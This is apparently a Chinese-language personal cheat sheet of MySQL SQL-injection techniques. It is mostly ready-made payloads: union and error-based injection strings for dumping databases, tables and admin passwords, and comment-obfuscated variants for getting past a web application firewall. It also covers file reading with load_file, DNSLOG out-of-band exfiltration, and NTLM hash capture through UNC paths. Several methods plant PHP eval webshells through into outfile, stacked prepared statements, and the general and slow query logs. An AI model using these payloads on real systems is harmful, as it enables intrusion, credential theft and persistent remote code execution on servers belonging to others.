mysql-备忘录

mysql基础注入知识

参考资料:
https://pureqh.top/?p=1882 bypass安全狗

常用函数

ascii()
length()
substr()                       # 左闭右闭
hex()
isnull()                       # isnull+load_file可以扫描判断文件名是否存在

concat(0x7e,version(),0x7e)    # 多个字符串连接成一个字符串
concat_ws(0x7e,'a','b','c')    # 效果和concat一样

group_concat()                 # 将group by产生的同一个分组中的值连接起来,返回一个字符串结果(将一个组里的数据全部拼接起来)    https://www.cnblogs.com/xinruyi/p/11222724.html

select load_file('C:/wamp64/www/ma.php')                                                  # 读文件, 文件不存在返回null, 没权限读也返回null
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/wamp64/www/ma.php';                 # 写文件

User.html?keyword=c3514') and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1) -- -  updatexml 报错注入
User.html?keyword=c3514') and extractvalue(1,concat(0x7e,version(),0x7e)); -- -                       extractvalue 报错注入

select load_file('\\\\172.16.100.1\\mysql');                             LOAD_FILE支持UNC路径, 可以获取net-ntlm hash

基础注入语句

https://www.cnblogs.com/peterpan0707007/p/7536126.html

union select 1,group_concat(schema_name),3 from information_schema.schemata //爆库
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()//爆表
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='表名'//爆字段

###########################################################################################################################################

查数据库名:
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(schema_name) from information_schema.schemata),8,9,10,11,12,13,14,15,16

查表名:
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(table_name) from information_schema.tables where table_schema=database()),8,9,10,11,12,13,14,15,16

查列名:
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(column_name) from information_schema.columns where table_schema=database/*!80000aaa*/()),8,9,10,11,12,13,14,15,16

查字段:
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(name,password) from adm_check),8,9,10,11,12,13,14,15,16

基本知识记录

  1. 查看数据库是否允许文件读写

    show global variables like '%secure%';
    show global variables like "%secure_file_priv%";
    

    5.5.53(2019-09-29发布)默认为空,之后的版本默认为NULL    历史版本查询: https://downloads.mysql.com/archives/community/
    
    
    MySQL新版本中的secure_file_priv参数: 用来限制LOAD DATA、SELECT ... INTO OUTFILE和LOAD_FILE()只能在指定目录下进行导入/导出
    
    当secure_file_priv的值为null,表示限制mysqld不允许导入/导出
    当secure_file_priv的值为/tmp/,表示限制mysqld的导入|导出只能发生在/tmp/目录下
    当secure_file_priv的值为空(空字符串)时,表示不对mysqld的导入|导出做限制。
    
    secure_file_priv这个值是只读变量,只能通过配置文件修改。
    
  2. 判断文件是否存在

    如果文件存在,isnull(load_file('文件名'))返回0
    mysql> select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0);
    ERROR 1105 (HY000): XPATH syntax error: '~0~'
    
    如果文件不存在isnull(load_file('文件名'))返回1
    mysql> select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/xxxxx')),0x7e),0);
    ERROR 1105 (HY000): XPATH syntax error: '~1~'
    


1 读文件

select load_file('C:/wamp64/www/ma.php')

1. 联合注入+load_file读文件
SELECT * FROM user WHERE id=-1 UNION select 1,'1',(select load_file('D:/1.php'))

2. DNSLOG带外查询
需要windows环境
SELECT id FROM user WHERE id = load_file (concat('\\\\',hex((select load_file('D:/1.php'))),'.t00ls.xxxxxxxxx.tu4.org\\a.txt'))

3. 报错注入+load_file读文件
ps:报错注入读文件内容,有时候会由于报错长度受限或者文件编码问题,推荐采用hex编码方式分段读取文件内容
select * from user  where username = '' and updatexml(0,concat(0x7e,(LOAD_FILE('D:/1.php')),0x7e),0)
select * from user where id=1 and (extractvalue(1,concat(0x7e,(select (LOAD_FILE('D:/1.php'))),0x7e)))

2.1 写文件

使用条件

A、必须有权限读取并且文件必须完全可读 
​   and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。
​   and (select count(*) from mysql.user)>0/* 返回错误,应该是管理员给数据库帐户降权

B、欲读取文件必须在服务器上 

C、必须指定文件完整的路径 

D、欲读取文件必须小于 max_allowed_packet
1. 基础写
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/wamp64/www/ma.php';

2. union注入写文件
SELECT * FROM user WHERE id = -1 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'D:/1.php'

3. FIELDS TERMINATED BY(可在limit等语句后)  fields terminated by '字段间分隔符', 定义字段间的分隔符
SELECT * FROM user WHERE id = 1 into outfile 'D:/1.php' fields terminated by 0x3c3f70687020706870696e666f28293b3f3e

4.LINES TERMINATED BY(可用于limit等sql注入)  lines terminated by '行间分隔符', 定义每行的分隔符 (optionally enclosed by '字段包围符' 则定义包围字段的字符, 数值型字段无效)
SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e

5.LINES STARTING BY(可用于limit等sql注入)   lines starting by '行首前缀', 定义每行开头的前缀字符串
SELECT username FROM user WHERE id = 1 into outfile 'D:/2.php' LINES STARTING  BY 0x3c3f70687020706870696e666f28293b3f3e

2.2 堆叠写shell

mysql> select hex('select "<?php phpinfo();eval($_POST[x]);" into outfile "D:/wwwroot/baidu.com/test2.php"');
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| hex('select "<?php phpinfo();eval($_POST[x]);" into outfile "D:/wwwroot/baidu.com/test2.php"')                                                                                |
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 73656C65637420223C3F70687020706870696E666F28293B6576616C28245F504F53545B785D293B2220696E746F206F757466696C652022443A2F777777726F6F742F737669702E636F6D2F74657374322E70687022 |
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> set @x=0x73656C65637420223C3F70687020706870696E666F28293B6576616C28245F504F53545B785D293B2220696E746F206F757466696C652022443A2F777777726F6F742F737669702E636F6D2F74657374322E7
Query OK, 0 rows affected (0.00 sec)

mysql> prepare  xx from @x;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

mysql> execute  xx;
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
mysql>

2.3 利用日志写shell

SHOW VARIABLES LIKE 'general%'

开启日志
set global general_log = "ON";
set global general_log_file='C:/wamp64/www/ma.php';
select '<?php eval($_POST[cmd]);?>';

2.4 慢查询日志写shell

MySQL的慢查询日志是MySQL提供的一种日志记录,它用来记录在MySQL中响应时间超过阈值的语句。long_query_time的默认值为10,意思是运行10秒以上的语句;该值可以指定到微秒精度。具体指运行时间超过long_query_time值的SQL会被记录到慢查询日志中。对日志量庞大,通过日志文件GETSHELL确实是一种帮助

show variables like '%slow%';

log_slow_admin_statements	OFF
log_slow_slave_statements	OFF
slow_launch_time	2
slow_query_log	OFF
slow_query_log_file	           C:\phpstudy_pro\Extensions\MySQL5.7.26\data\root-PC-slow.log

set GLOBAL slow_query_log_file='C:/phpstudy_pro/WWW/shopxo-1.6.0/slow.php';
set GLOBAL slow_query_log=on;

select '<?php phpinfo();?>' from mysql.db where sleep(10);


还原
set GLOBAL slow_query_log_file='C:/phpstudy_pro/Extensions/MySQL5.7.26/data/root-PC-slow.log';
set GLOBAL slow_query_log=off;
show variables like '%slow%';